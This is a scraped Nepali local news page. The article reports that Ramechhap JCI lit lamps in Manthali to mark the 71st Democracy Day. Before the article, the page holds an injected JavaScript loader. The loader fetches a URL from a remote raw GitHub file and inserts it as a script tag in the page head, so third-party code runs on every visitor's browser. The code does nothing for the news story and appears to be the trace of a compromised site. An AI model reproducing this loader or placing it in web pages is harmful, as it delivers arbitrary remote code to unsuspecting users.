;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ७१ ओैंं प्रजातन्त्र दिवसकाे अवसरमा रामेछाप जेसिजद्वरा मन्थलीमा दीप प्रज्वलन (भिडियो) – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ७१ ओैंं प्रजातन्त्र दिवसकाे अवसरमा रामेछाप जेसिजद्वरा मन्थलीमा दीप प्रज्वलन (भिडियो)
जुनेली बिशेष

७१ ओैंं प्रजातन्त्र दिवसकाे अवसरमा रामेछाप जेसिजद्वरा मन्थलीमा दीप प्रज्वलन (भिडियो)

फागुन  ०७,

रामेछाप । रामेछाप जेसिजले ७१ ओैं प्रजातन्त्र दिवसको अवसरमा दीप प्रज्वलन् गरेकाे छ ।
शुक्रबार साँझ मन्थलीकाे देवकोटा चाेकमा दीप प्रज्वलन् गरेकाे हाे । शुक्रबार देशब्यापी रुपमा प्रजातन्त्र दिवस भब्यताकासाथ मनाईएकाे छ । साेही अवसर पारि जेसिजले दीप जलाएर प्रजातन्त्रको संरक्षण र समर्थ गरेकाे हाे ।

दीप प्रज्वलन कार्यक्रममा रामेछाप सहयोगी मन (रासम) का प्रतिनिधि सहित सर्वसाधारण, विद्यार्थी, ब्यवसायीहरुकाे उपस्तिथि रहेकाे थियाे ।

फेसबुक प्रतिक्रियाहरु